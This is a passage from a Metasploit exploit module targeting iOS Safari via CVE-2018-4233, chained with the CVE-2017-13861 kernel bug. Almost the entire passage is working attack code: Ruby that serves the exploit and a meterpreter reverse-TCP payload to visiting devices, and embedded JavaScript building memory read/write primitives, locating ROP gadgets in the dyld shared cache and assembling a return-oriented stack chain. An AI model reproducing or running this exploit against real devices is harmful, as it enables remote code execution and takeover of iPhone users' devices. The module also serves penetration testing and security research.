overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => 'Mar 15 2018'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def exploit_data(directory, file)\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\n ::File.binread path\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? '\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' : '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? '\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; 